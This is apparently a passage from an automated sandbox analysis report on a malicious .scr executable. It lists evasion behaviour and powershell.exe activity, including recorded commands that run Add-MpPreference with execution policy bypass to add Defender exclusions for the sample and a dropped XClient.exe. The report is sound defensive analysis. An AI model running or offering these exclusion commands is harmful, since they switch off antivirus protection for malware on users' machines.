              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 4916, type: MEMORYSTR
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 13D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 3070000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 2DD0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 80D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 75C0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 90D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: A0D0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 30C0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 3300000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 5300000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWindow / User API: threadDelayed 453
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWindow / User API: threadDelayed 9372
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5948
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2848
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8015
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1605
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7858
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1829
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6649
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3105
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 3620Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 3160Thread sleep count: 41 > 30
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 3160Thread sleep time: -37815825351104557s >= -30000s
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 2924Thread sleep count: 453 > 30
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 2924Thread sleep count: 9372 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 612Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5716Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep count: 8015 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 1605 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 7858 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 1829 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2664Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4559034426.00000000014AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
